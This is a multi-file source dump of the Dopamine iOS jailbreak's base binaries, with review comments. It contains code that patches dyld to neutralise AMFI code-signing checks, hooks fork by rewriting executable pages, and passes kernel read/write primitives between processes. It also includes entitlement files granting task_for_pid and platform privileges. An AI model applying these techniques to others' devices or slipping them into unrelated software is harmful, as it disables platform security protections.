    [gHandler sendMessage:@{ @"id" : @"primitivesInitialized" }];
}

// Phase 2: serve requests from the peer until it reports
// "primitivesInitialized".
//   "getPPLRW"        -> handoffPPLPrimitives(1), reply "receivePPLRW" with the
//                        result code and this process's pid (the argument 1 is
//                        presumably the target pid; confirm in libjailbreak)
//   "signThreadState" -> signState() on the value of "actContext", reply
//                        "signedThreadState"
// NOTE(review): "actContext" is taken from the message and passed to
// signState() as a kernel pointer with no validation; a missing key yields 0.
// The channel is a pair of files (see main), so whoever can write those files
// can drive this handler. Their ownership and permissions are not visible in
// this file and are the effective access control for these operations.
void sendPrimitives(void)
{
    dispatch_semaphore_t sema = dispatch_semaphore_create(0);
    gHandler.receiveHandler = ^(NSDictionary *message) {
        NSString *identifier = message[@"id"];
        if (identifier) {
            if ([identifier isEqualToString:@"getPPLRW"]) {
                int ret = handoffPPLPrimitives(1);
                [gHandler sendMessage:@{@"id" : @"receivePPLRW", @"errorCode" : @(ret), @"boomerangPid" : @(getpid())}];
            }
            else if ([identifier isEqualToString:@"signThreadState"]) {
                uint64_t actContextKptr = [(NSNumber*)message[@"actContext"] unsignedLongLongValue];
                signState(actContextKptr);
                [gHandler sendMessage:@{@"id" : @"signedThreadState"}];
            }
            else if ([identifier isEqualToString:@"primitivesInitialized"])
            {
                dispatch_semaphore_signal(sema); // DONE, exit
            }
        }
    };
    dispatch_semaphore_wait(sema, DISPATCH_TIME_FOREVER);
}

// Starts a new session with setsid(), opens the two message files under the
// preboot path (launchd_to_boomerang for receiving, boomerang_to_launchd for
// sending), then runs the two phases in order and exits.
int main(int argc, char* argv[])
{
    setsid();
    gHandler = [[FCHandler alloc] initWithReceiveFilePath:prebootPath(@"basebin/.communication/launchd_to_boomerang") sendFilePath:prebootPath(@"basebin/.communication/boomerang_to_launchd")];
    getPrimitives();
    sendPrimitives();
    return 0;
}
-------------------------------------------------------------------------------- /BaseBin/clean.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | set -e 4 | 5 | PREV_DIR=$(pwd) 6 | PACK_DIR=$(dirname -- "$0") 7 | cd "$PACK_DIR" 8 | 9 | # libfilecom 10 | cd "libfilecom" 11 | make clean 12 | cd - 13 | 14 | # libjailbreak 15 | cd "libjailbreak" 16 | make clean 17 | cd - 18 | 19 | # jailbreakd 20 | cd "jailbreakd" 21 | make clean 22 | cd - 23 | 24 | # jailbreakd 25 | cd "idownloadd" 26 | make clean 27 | cd - 28 | 29 | # boomerang 30 | cd "boomerang" 31 | make clean 32 | cd - 33 | 34 | # jbinit 35 | cd "jbinit" 36 | make clean 37 | cd - 38 | 39 | # jbctl 40 | cd "jbctl" 41 | make clean 42 | cd - 43 | 44 | # launchdhook 45 | cd "launchdhook" 46 | make clean 47 | cd - 48 | 49 | # systemhook 50 | cd "systemhook" 51 | make clean 52 | cd - 53 | 54 | # watchdoghook 55 | cd "watchdoghook" 56 | make clean 57 | cd - 58 | 59 | # rootlesshooks 60 | cd "rootlesshooks" 61 | make clean 62 | cd - 63 | 64 | # forkfix 65 | cd "forkfix" 66 | make clean 67 | cd - 68 | 69 | cd "$PREV_DIR" -------------------------------------------------------------------------------- /BaseBin/forkfix/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = forkfix.dylib 2 | CC = clang 3 | 4 | CFLAGS = -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -O2 5 | LDFLAGS = -dynamiclib ../systemhook/systemhook.dylib 6 | 7 | sign: $(TARGET) 8 | @ldid -S $^ 9 | 10 | $(TARGET): $(wildcard src/*.c src/*.S) 11 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 12 | install_name_tool -change "systemhook.dylib" "/usr/lib/systemhook.dylib" 
$@ 13 | 14 | clean: 15 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/forkfix/src/litehook.c: -------------------------------------------------------------------------------- 1 | #include "litehook.h" 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | static uint64_t __attribute((naked)) __xpaci(uint64_t a) 16 | { 17 | asm(".long 0xDAC143E0"); // XPACI X0 18 | asm("ret"); 19 | } 20 | 21 | uint64_t xpaci(uint64_t a) 22 | { 23 | // If a looks like a non-pac'd pointer just return it 24 | if ((a & 0xFFFFFF0000000000) == 0xFFFFFF0000000000) { 25 | return a; 26 | } 27 | return __xpaci(a); 28 | } 29 | 30 | uint32_t movk(uint8_t x, uint16_t val, uint16_t lsl) 31 | { 32 | uint32_t base = 0b11110010100000000000000000000000; 33 | 34 | uint32_t hw = 0; 35 | if (lsl == 16) { 36 | hw = 0b01 << 21; 37 | } 38 | else if (lsl == 32) { 39 | hw = 0b10 << 21; 40 | } 41 | else if (lsl == 48) { 42 | hw = 0b11 << 21; 43 | } 44 | 45 | uint32_t imm16 = (uint32_t)val << 5; 46 | uint32_t rd = x & 0x1F; 47 | 48 | return base | hw | imm16 | rd; 49 | } 50 | 51 | uint32_t br(uint8_t x) 52 | { 53 | uint32_t base = 0b11010110000111110000000000000000; 54 | uint32_t rn = ((uint32_t)x & 0x1F) << 5; 55 | return base | rn; 56 | } 57 | 58 | __attribute__((noinline, naked)) volatile kern_return_t litehook_vm_protect(mach_port_name_t target, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection) 59 | { 60 | __asm("mov x16, #0xFFFFFFFFFFFFFFF2"); 61 | __asm("svc 0x80"); 62 | __asm("ret"); 63 | } 64 | 65 | kern_return_t litehook_unprotect(vm_address_t addr, vm_size_t size) 66 | { 67 | return litehook_vm_protect(mach_task_self(), addr, size, false, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY); 68 | } 69 | 70 | kern_return_t litehook_protect(vm_address_t addr, vm_size_t size) 71 | { 72 | 
return litehook_vm_protect(mach_task_self(), addr, size, false, VM_PROT_READ | VM_PROT_EXECUTE); 73 | } 74 | 75 | kern_return_t litehook_hook_function(void *source, void *target) 76 | { 77 | kern_return_t kr = KERN_SUCCESS; 78 | 79 | uint32_t *toHook = (uint32_t*)xpaci((uint64_t)source); 80 | uint64_t target64 = (uint64_t)xpaci((uint64_t)target); 81 | 82 | kr = litehook_unprotect((vm_address_t)toHook, 5*4); 83 | if (kr != KERN_SUCCESS) return kr; 84 | 85 | toHook[0] = movk(16, target64 >> 0, 0); 86 | toHook[1] = movk(16, target64 >> 16, 16); 87 | toHook[2] = movk(16, target64 >> 32, 32); 88 | toHook[3] = movk(16, target64 >> 48, 48); 89 | toHook[4] = br(16); 90 | uint32_t hookSize = 5 * sizeof(uint32_t); 91 | 92 | kr = litehook_protect((vm_address_t)toHook, hookSize); 93 | if (kr != KERN_SUCCESS) return kr; 94 | 95 | sys_icache_invalidate(toHook, hookSize); 96 | 97 | return KERN_SUCCESS; 98 | } -------------------------------------------------------------------------------- /BaseBin/forkfix/src/litehook.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | kern_return_t litehook_hook_function(void *source, void *target); -------------------------------------------------------------------------------- /BaseBin/forkfix/src/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "syscall.h" 9 | #include "litehook.h" 10 | 11 | extern int64_t jbdswForkFix(pid_t childPid); 12 | extern void _malloc_fork_prepare(void); 13 | extern void _malloc_fork_parent(void); 14 | extern void xpc_atfork_prepare(void); 15 | extern void xpc_atfork_parent(void); 16 | extern void dispatch_atfork_prepare(void); 17 | extern void dispatch_atfork_parent(void); 18 | extern void __fork(void); 19 | 20 | int childToParentPipe[2]; 21 | int parentToChildPipe[2]; 22 | static void 
openPipes(void)
{
    if (pipe(parentToChildPipe) < 0 || pipe(childToParentPipe) < 0) {
        abort();
    }
}

// Closes all four pipe ends through the raw close stub and aborts on the first
// one that does not return 0. Order is unchanged: both ends of
// parentToChildPipe, then both ends of childToParentPipe.
static void closePipes(void)
{
    int *const pipes[2] = { parentToChildPipe, childToParentPipe };
    for (int p = 0; p < 2; p++) {
        for (int end = 0; end < 2; end++) {
            if (ffsys_close(pipes[p][end]) != 0) {
                abort();
            }
        }
    }
}

// Child half of the handshake: sends one byte on childToParentPipe, then
// blocks until one byte arrives on parentToChildPipe.
//
// NOTE(review): neither return value is checked. The ffsys_read/ffsys_write
// stubs in syscall.S return straight after svc without testing the carry
// flag, so a failure presumably comes back as a positive error number rather
// than -1 - confirm before adding a check, a plain "< 0" test would miss it.
void child_fixup(void)
{
    char token = ' ';

    // Tell parent we are waiting for fixup now
    ffsys_write(childToParentPipe[1], &token, sizeof(token));

    // Wait until parent completes fixup
    ffsys_read(parentToChildPipe[0], &token, sizeof(token));
}

// Parent half of the handshake. Re-enables malloc, dispatch and XPC (in that
// order), waits for the child's byte, asks jbdswForkFix to fix up the child,
// releases the child with one byte and puts malloc, dispatch and XPC back into
// their fork-prepare state.
//
// A non-zero jbdswForkFix result kills the child with SIGKILL and aborts the
// calling process.
//
// NOTE(review): the read() and write() results are ignored. Both processes
// hold both ends of both pipes (they are opened before the fork and closed
// only after the handshake), so a failed write() here leaves the child blocked
// in ffsys_read with no EOF to wake it; a failed read() lets the fixup run
// without knowing the child reached its wait. Worth checking both and taking
// the same kill-and-abort path used for a failed fixup.
void parent_fixup(pid_t childPid)
{
    // Reenable some system functionality that XPC is dependent on and XPC itself
    // (Normally unavailable during __fork)
    _malloc_fork_parent();
    dispatch_atfork_parent();
    xpc_atfork_parent();

    // Wait until the child is ready and waiting
    char token = ' ';
    read(childToParentPipe[0], &token, sizeof(token));

    // Child is waiting for wx_allowed + permission fixups now
    // Apply fixup
    if (jbdswForkFix(childPid) != 0) {
        kill(childPid, SIGKILL);
        abort();
    }

    // Tell child we are done, this will make it resume
    write(parentToChildPipe[1], &token, sizeof(token));

    // Disable system functionality related to XPC again
    _malloc_fork_prepare();
    dispatch_atfork_prepare();
    xpc_atfork_prepare();
}

// Replacement for __fork: opens the two handshake pipes, forks through the raw
// stub, runs the child or parent half of the handshake, closes the pipes and
// returns what the fork stub returned (negative on failure, 0 in the child,
// the child's pid in the parent).
//
// NOTE(review): the pipe descriptors live in file-scope arrays, so two threads
// forking at the same time would share them - confirm callers serialize fork.
__attribute__((visibility ("default"))) pid_t forkfix___fork(void)
{
    openPipes();

    pid_t pid = ffsys_fork();
    if (pid == 0) {
        child_fixup();
    }
    else if (pid > 0) {
        parent_fixup(pid);
    }
    // pid < 0: fork failed, nothing to hand-shake with

    closePipes();
    return pid;
}

__attribute__((constructor)) static void initializer(void)
{
    litehook_hook_function((void *)&__fork, (void
*)&forkfix___fork); 98 | } -------------------------------------------------------------------------------- /BaseBin/forkfix/src/syscall.S: -------------------------------------------------------------------------------- 1 | .text 2 | 3 | .align 4 4 | 5 | .global _ffsys_fork 6 | _ffsys_fork: 7 | pacibsp 8 | stp x29, x30, [SP, #-0x10]! 9 | mov x29, sp 10 | mov x16, #2 11 | svc 0x80 12 | b.cs _ffsys_fork_err 13 | cbz x1, _ffsys_fork_end 14 | mov w0, #0 15 | adrp x9, __current_pid@GOTPAGE 16 | ldr x9, [x9, __current_pid@GOTPAGEOFF] 17 | str w0, [x9] 18 | b _ffsys_fork_end 19 | 20 | _ffsys_fork_err: 21 | bl _cerror 22 | mov w0, #-1 23 | 24 | _ffsys_fork_end: 25 | mov sp, x29 26 | ldp x29, x30, [SP],#0x10 27 | retab 28 | 29 | .global _ffsys_vm_protect 30 | _ffsys_vm_protect: 31 | mov x16, #-14 32 | svc 0x80 33 | ret 34 | 35 | .global _ffsys_getpid 36 | _ffsys_getpid: 37 | mov x16, #20 38 | svc 0x80 39 | ret 40 | 41 | .global _ffsys_pid_suspend 42 | _ffsys_pid_suspend: 43 | mov x16, #433 44 | svc 0x80 45 | ret 46 | 47 | .global _ffsys_read 48 | _ffsys_read: 49 | mov x16, #3 50 | svc 0x80 51 | ret 52 | 53 | .global _ffsys_write 54 | _ffsys_write: 55 | mov x16, #4 56 | svc 0x80 57 | ret 58 | 59 | .global _ffsys_close 60 | _ffsys_close: 61 | mov x16, #6 62 | svc 0x80 63 | ret 64 | -------------------------------------------------------------------------------- /BaseBin/forkfix/src/syscall.h: -------------------------------------------------------------------------------- 1 | kern_return_t ffsys_vm_protect(vm_map_t target_task, vm_address_t address, vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection); 2 | pid_t ffsys_fork(void); 3 | pid_t ffsys_getpid(void); 4 | int ffsys_pid_suspend(pid_t pid); 5 | 6 | ssize_t ffsys_read(int fildes, void *buf, size_t nbyte); 7 | ssize_t ffsys_write(int fildes, const void *buf, size_t nbyte); 8 | int ffsys_close(int fildes); 9 | -------------------------------------------------------------------------------- 
/BaseBin/forkfix/upload.sh: -------------------------------------------------------------------------------- 1 | set -e 2 | 3 | PROJECT_NAME=forkfix.dylib 4 | DEVICE=root@localhost 5 | PORT=2222 6 | 7 | make 8 | ssh $DEVICE -p $PORT "rm -rf /var/jb/usr/lib/$PROJECT_NAME" 9 | scp -P$PORT ./$PROJECT_NAME $DEVICE:/var/jb/usr/lib/$PROJECT_NAME 10 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/Makefile: -------------------------------------------------------------------------------- 1 | XCODE_PROJECT = src/idownloadd.xcodeproj 2 | XCODE_SCHEME = idownloadd 3 | CS_FLAGS = CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO CODE_SIGNING_ALLOWED=NO 4 | CONFIGURATION = Release 5 | 6 | OUTPUT_NAME = idownloadd 7 | 8 | build: 9 | xcodebuild -archivePath ./.build -project $(XCODE_PROJECT) -scheme $(XCODE_SCHEME) -configuration $(CONFIGURATION) -destination generic/platform=iOS archive $(CS_FLAGS) 10 | @cp -f ./.build.xcarchive/Products/usr/local/bin/$(OUTPUT_NAME) . 
11 | @rm -rf ./.build.xcarchive 12 | @install_name_tool -change "/var/jb/basebin/libjailbreak.dylib" "@loader_path/libjailbreak.dylib" $(OUTPUT_NAME) 13 | @ldid -Sentitlements.plist $(OUTPUT_NAME) 14 | 15 | clean: 16 | xcodebuild -project $(XCODE_PROJECT) -scheme $(XCODE_SCHEME) -configuration $(CONFIGURATION) -destination generic/platform=iOS clean 17 | @rm $(OUTPUT_NAME) 18 | 19 | default: build -------------------------------------------------------------------------------- /BaseBin/idownloadd/daemon.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Label 6 | com.opa334.idownloadd 7 | ProgramArguments 8 | 9 | basebin/idownloadd 10 | 11 | UserName 12 | root 13 | RunAtLoad 14 | 15 | KeepAlive 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/entitlements.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | com.apple.private.security.no-container 8 | 9 | com.apple.private.security.storage.AppBundles 10 | 11 | com.apple.private.security.storage.AppDataContainers 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- 
/BaseBin/idownloadd/src/idownloadd.xcodeproj/project.xcworkspace/xcshareddata/swiftpm/Package.resolved: -------------------------------------------------------------------------------- 1 | { 2 | "pins" : [ 3 | { 4 | "identity" : "idownload", 5 | "kind" : "remoteSourceControl", 6 | "location" : "https://github.com/pinauten/iDownload", 7 | "state" : { 8 | "branch" : "master", 9 | "revision" : "62920e864f06af4b0a50a0aa9b6e0a7c7bd83a6f" 10 | } 11 | }, 12 | { 13 | "identity" : "swiftutils", 14 | "kind" : "remoteSourceControl", 15 | "location" : "https://github.com/pinauten/SwiftUtils", 16 | "state" : { 17 | "branch" : "master", 18 | "revision" : "1d37faabb4c58b3152394c9b6e1c1a68507646b9" 19 | } 20 | } 21 | ], 22 | "version" : 2 23 | } 24 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd/iDownloadCmds.swift: -------------------------------------------------------------------------------- 1 | // 2 | // iDownloadCMDs.swift 3 | // idownloadd 4 | // 5 | // Created by Lars Fröder on 08.06.23. 6 | // 7 | 8 | import Foundation 9 | import iDownload 10 | 11 | let iDownloadCmds = [ 12 | "help": iDownload_help 13 | ] as [String: iDownloadCmd] 14 | 15 | func iDownload_help(_ hndlr: iDownloadHandler, _ cmd: String, _ args: [String]) throws { 16 | try hndlr.sendline("") 17 | } 18 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd/idownloadd-Bridging-Header.h: -------------------------------------------------------------------------------- 1 | // 2 | // idownloadd-Bridging-Header.h 3 | // idownloadd 4 | // 5 | // Created by Lars Fröder on 08.06.23. 
6 | // 7 | 8 | #ifndef idownloadd_Bridging_Header_h 9 | #define idownloadd_Bridging_Header_h 10 | 11 | #import 12 | 13 | #import 14 | #import 15 | #import 16 | 17 | #endif /* idownloadd_Bridging_Header_h */ 18 | -------------------------------------------------------------------------------- /BaseBin/idownloadd/src/idownloadd/main.swift: -------------------------------------------------------------------------------- 1 | // 2 | // main.swift 3 | // idownloadd 4 | // 5 | // Created by Lars Fröder on 08.06.23. 6 | // 7 | 8 | import Foundation 9 | import iDownload 10 | 11 | jbdInitPPLRW(); 12 | 13 | do { 14 | try iDownload.launch_iDownload(krw: iDownloadKRW(), otherCmds: iDownloadCmds) 15 | } catch let e { 16 | NSLog("Failed to launch iDownload: \(e)") 17 | exit(1) 18 | } 19 | 20 | RunLoop.main.run() 21 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = jailbreakd 2 | 3 | CC = clang 4 | 5 | CFLAGS = -framework Foundation -framework CoreServices -framework Security -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -Wno-nullability-completeness-on-arrays -DBUNDLE_ID=page.liam.Dopamine -O3 6 | LDFLAGS = -L../libjailbreak -ljailbreak -lbsm -larchive 7 | 8 | sign: $(TARGET) 9 | @ldid -Sentitlements.plist $< 10 | 11 | $(TARGET): $(wildcard src/*.m src/*.S src/machoparse/*.c) 12 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 13 | install_name_tool -change "/var/jb/basebin/libjailbreak.dylib" "@loader_path/libjailbreak.dylib" $@ 14 | 15 | clean: 16 | @rm -f $(TARGET) 17 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/README.md: -------------------------------------------------------------------------------- 1 | # Dopamine Base Binaries 2 | 3 | ## jailbreakd 4 | 5 | ### Supported 6 | 7 | 8 | Dopamine 
-> jailbreakd: 9 | - XPC call to jailbreakd, make it create a thread and return it -------------------------------------------------------------------------------- /BaseBin/jailbreakd/daemon.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ProcessType 6 | Interactive 7 | Label 8 | com.opa334.jailbreakd 9 | MachServices 10 | 11 | com.opa334.jailbreakd 12 | 13 | HostSpecialPort 14 | 16 15 | 16 | com.opa334.jailbreakd.systemwide 17 | 18 | 19 | ProgramArguments 20 | 21 | basebin/jailbreakd 22 | 23 | UserName 24 | root 25 | RunAtLoad 26 | 27 | KeepAlive 28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/entitlements.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | task_for_pid-allow 8 | 9 | com.apple.private.security.no-container 10 | 11 | com.apple.private.amfi.can-check-trust-cache 12 | 13 | com.apple.security.exception.iokit-user-client-class 14 | 15 | AppleMobileFileIntegrityUserClient 16 | 17 | com.apple.private.bindfs-allow 18 | 19 | com.apple.private.coreservices.canmaplsdatabase 20 | 21 | com.apple.private.security.storage.AppBundles 22 | 23 | com.apple.private.security.storage.AppDataContainers 24 | 25 | com.apple.private.xpc.launchd.userspace-reboot 26 | 27 | com.apple.springboard.CFUserNotification 28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /BaseBin/jailbreakd/src/JBDTCPage.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | #import "trustcache_structs.h" 4 | 5 | // 742 cdhashes fit into one page 6 | #define TC_ENTRY_COUNT_PER_PAGE 742 7 | 8 | @class JBDTCPage; 9 | 10 | extern NSMutableArray *gTCPages; 11 | extern NSMutableArray *gTCUnusedAllocations; 12 | BOOL tcPagesRecover(void); 13 | void tcPagesChanged(void); 14 | 15 | 16 | 
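@interface JBDTCPage : NSObject
{
    trustcache_page* _page;
}

@property (nonatomic) uint64_t kaddr;

- (instancetype)initWithKernelAddress:(uint64_t)kaddr;
- (instancetype)initAllocateAndLink;

- (void)sort;
- (uint32_t)amountOfSlotsLeft;
- (BOOL)addEntry:(trustcache_entry)entry;
- (BOOL)removeEntry:(trustcache_entry)entry;

- (void)unlinkAndFree;

@end
--------------------------------------------------------------------------------
/BaseBin/jailbreakd/src/codesign.h:
--------------------------------------------------------------------------------
#import
int resignFile(NSString *filePath, bool preserveMetadata);
--------------------------------------------------------------------------------
/BaseBin/jailbreakd/src/dyld_patch.h:
--------------------------------------------------------------------------------
#import
int applyDyldPatches(NSString *dyldPath);
--------------------------------------------------------------------------------
/BaseBin/jailbreakd/src/dyld_patch.m:
--------------------------------------------------------------------------------
#import
#import "codesign.h"
#import
#import

// Patches the dyld binary at dyldPath and re-signs it.
//
// The offset of dyld4::ProcessConfig::Security::getAMFI is looked up through
// CoreSymbolication (loaded with dlopen), two instruction words
// (mov x0, 0xDF; ret) are written at that offset, and the file is handed to
// resignFile().
//
// Returns 0 on success, 100 when the offset cannot be determined (framework or
// entry point missing, or symbol not found), 101 when the file cannot be
// opened or the write does not complete, otherwise the non-zero result of
// resignFile().
//
// On a 101 from the write stage the file may be partly modified and is not
// re-signed; callers should discard it rather than use it.
//
// NOTE(review): the symbol is resolved against "/usr/lib/dyld" while the bytes
// are written to dyldPath - this assumes dyldPath is an unmodified copy of that
// file; confirm against the caller.
// NOTE(review): range.location is used directly as a file offset - TODO
// confirm it equals the file offset for this binary.
int applyDyldPatches(NSString *dyldPath)
{
    if (!dyldPath) return 101;

    // Find offsets by abusing CoreSymbolication APIs
    void *csHandle = dlopen("/System/Library/PrivateFrameworks/CoreSymbolication.framework/CoreSymbolication", RTLD_NOW);
    if (!csHandle) return 100;

    CSSymbolicatorRef (*__CSSymbolicatorCreateWithPathAndArchitecture)(const char* path, cpu_type_t type) = dlsym(csHandle, "CSSymbolicatorCreateWithPathAndArchitecture");
    CSSymbolRef (*__CSSymbolicatorGetSymbolWithMangledNameAtTime)(CSSymbolicatorRef cs, const char* name, uint64_t time) = dlsym(csHandle, "CSSymbolicatorGetSymbolWithMangledNameAtTime");
    CSRange (*__CSSymbolGetRange)(CSSymbolRef sym) = dlsym(csHandle, "CSSymbolGetRange");
    //void (*__CSRelease)(CSTypeRef ptr) = dlsym(csHandle, "CSRelease");

    // A missing entry point would otherwise be called through a NULL pointer
    if (!__CSSymbolicatorCreateWithPathAndArchitecture || !__CSSymbolicatorGetSymbolWithMangledNameAtTime || !__CSSymbolGetRange) {
        return 100;
    }

    CSSymbolicatorRef symbolicator = __CSSymbolicatorCreateWithPathAndArchitecture("/usr/lib/dyld", CPU_TYPE_ARM64);
    CSSymbolRef symbol = __CSSymbolicatorGetSymbolWithMangledNameAtTime(symbolicator, "__ZN5dyld413ProcessConfig8Security7getAMFIERKNS0_7ProcessERNS_15SyscallDelegateE", 0);
    CSRange range = __CSSymbolGetRange(symbol);
    //__CSRelease(symbolicator);
    //__CSRelease(symbol);
    uint64_t getAMFIOffset = range.location;
    if (getAMFIOffset == 0) {
        return 100;
    }

    FILE *dyldFile = fopen(dyldPath.fileSystemRepresentation, "rb+");
    if (!dyldFile) return 101;

    uint32_t patchInstr[2] = {
        0xD2801BE0, // mov x0, 0xDF
        0xD65F03C0  // ret
    };

    // Only report the patch as applied when the seek, the write and the
    // flushing close all succeeded.
    BOOL written = (fseek(dyldFile, (long)getAMFIOffset, SEEK_SET) == 0)
        && (fwrite(patchInstr, sizeof(patchInstr), 1, dyldFile) == 1);
    if (fclose(dyldFile) != 0) {
        written = NO;
    }
    if (!written) return 101;
    JBLogDebug("patched dyld");

    int csRet = resignFile(dyldPath, true);
    if (csRet != 0) {
        return csRet;
    }
    JBLogDebug("resigned dyld");

    return 0;
}
--------------------------------------------------------------------------------
/BaseBin/jailbreakd/src/fakelib.h:
--------------------------------------------------------------------------------
int setFakeLibVisible(bool visible);
int makeFakeLib(void);
bool isFakeLibBindMountActive(void);
int setFakeLibBindMountActive(bool active);
int64_t registerJbPrefixedPath(NSString *sourcePath, int retry);
int64_t bindMountPath(NSString *sourcePath, bool check_existances);
int64_t bindUnmountPath(NSString *sourcePath);

--------------------------------------------------------------------------------
/BaseBin/jailbreakd/src/forkfix.h:
--------------------------------------------------------------------------------
int64_t apply_fork_fixup(pid_t parentPid, pid_t childPid);
--------------------------------------------------------------------------------
/BaseBin/jailbreakd/src/forkfix.m: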
--------------------------------------------------------------------------------
#import
#import
#import
#import
#import
#import
#import
extern int pid_resume(int pid);

// Walks the VM map entry lists of parent and child in step and, for every pair
// of entries that start at the same address, copies the parent's current and
// maximum protection onto the child entry when they differ.
//
// The walk stops when either list ends or either entry count is exhausted.
// NOTE(review): entries are paired on start address only; the end addresses
// read by vm_entry_get_range are not compared, so a child entry that starts at
// the same address but covers a different length still receives the parent's
// protection - confirm this is intended.
static void forkfix_copy_entry_protections(uint64_t parentVmMap, uint64_t childVmMap)
{
    uint64_t parentHeader = vm_map_get_header(parentVmMap);
    uint64_t parentEntry = vm_map_header_get_first_entry(parentHeader);
    uint32_t parentTotal = vm_header_get_nentries(parentHeader);

    uint64_t childHeader = vm_map_get_header(childVmMap);
    uint64_t childEntry = vm_map_header_get_first_entry(childHeader);
    uint32_t childTotal = vm_header_get_nentries(childHeader);

    uint32_t childSeen = 0;
    uint32_t parentSeen = 0;
    while (childSeen < childTotal && childEntry != 0 && parentSeen < parentTotal && parentEntry != 0) {
        uint64_t childStart = 0, childEnd = 0;
        vm_entry_get_range(childEntry, &childStart, &childEnd);
        uint64_t parentStart = 0, parentEnd = 0;
        vm_entry_get_range(parentEntry, &parentStart, &parentEnd);

        if (parentStart == childStart) {
            vm_prot_t parentProt = 0, parentMaxProt = 0;
            vm_map_entry_get_prot(parentEntry, &parentProt, &parentMaxProt);
            vm_prot_t childProt = 0, childMaxProt = 0;
            vm_map_entry_get_prot(childEntry, &childProt, &childMaxProt);

            if (parentProt != childProt || parentMaxProt != childMaxProt) {
                vm_map_entry_set_prot(childEntry, parentProt, parentMaxProt);
            }
        }

        // The side that is behind advances; on a match both advance
        if (parentStart <= childStart) {
            parentEntry = vm_map_entry_get_next_entry(parentEntry);
            parentSeen++;
        }
        if (parentStart >= childStart) {
            childEntry = vm_map_entry_get_next_entry(childEntry);
            childSeen++;
        }
    }
}

// Applies the post-fork fixup to childPid on behalf of parentPid.
//
// Returns 3 when either process cannot be looked up, 2 when the child's parent
// pointer is not the parent process, and 0 once the child's debugged flag has
// been cleared and its entry protections have been aligned with the parent's.
// Process references obtained from proc_for_pid are released on every path.
//
// NOTE(review): the parent/child relation is the only authorization check made
// here, so parentPid has to identify the actual requester - presumably taken
// from the caller's audit token rather than from the message; verify in the
// request handler.
int64_t apply_fork_fixup(pid_t parentPid, pid_t childPid)
{
    bool releaseChild = false;
    uint64_t childProc = proc_for_pid(childPid, &releaseChild);

    bool releaseParent = false;
    uint64_t parentProc = proc_for_pid(parentPid, &releaseParent);

    int64_t result = 3;
    if (childProc && parentProc) {
        // Safety check to ensure we are actually coming from fork
        if (proc_get_pptr(childProc) != parentProc) {
            result = 2;
        }
        else {
            proc_set_debugged(childProc, false);

            uint64_t childTask = proc_get_task(childProc);
            uint64_t childVmMap = task_get_vm_map(childTask);

            uint64_t parentTask = proc_get_task(parentProc);
            uint64_t parentVmMap = task_get_vm_map(parentTask);

            forkfix_copy_entry_protections(parentVmMap, childVmMap);
            result = 0;
        }
    }

    if (releaseChild) proc_rele(childProc);
    if (releaseParent) proc_rele(parentProc);

    return result;
}
--------------------------------------------------------------------------------
/BaseBin/jailbreakd/src/server.h:
--------------------------------------------------------------------------------
#import

int reboot3(uint64_t flags, ...);
#define RB2_USERREBOOT (0x2000000000000000llu)

extern NSDictionary* gBootInfo;
uint64_t bootInfo_getUInt64(NSString* name);
uint64_t bootInfo_getSlidUInt64(NSString* name);
NSData* bootInfo_getData(NSString* name);

extern uint64_t gSelfProc;
extern uint64_t gSelfTask;

void primitivesInitializedCallback(void);
--------------------------------------------------------------------------------
/BaseBin/jailbreakd/src/spawn_wrapper.h:
--------------------------------------------------------------------------------
#import
int spawn(NSString* path, NSArray* args);
--------------------------------------------------------------------------------
/BaseBin/jailbreakd/src/spawn_wrapper.m:
--------------------------------------------------------------------------------
#import
#import
#import "spawn_wrapper.h"
#import
extern char
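**environ;

// Runs the executable at `path` with `args` (path itself becomes argv[0]),
// inheriting the current environment, and waits for it to finish.
//
// Returns:
//   the child's exit status when it exited normally,
//   128 + signal number when it was terminated by a signal (previously this
//     case fell through WEXITSTATUS and read as 0, i.e. as success),
//   the posix_spawn error number when the process could not be started,
//   -222 when waitpid fails,
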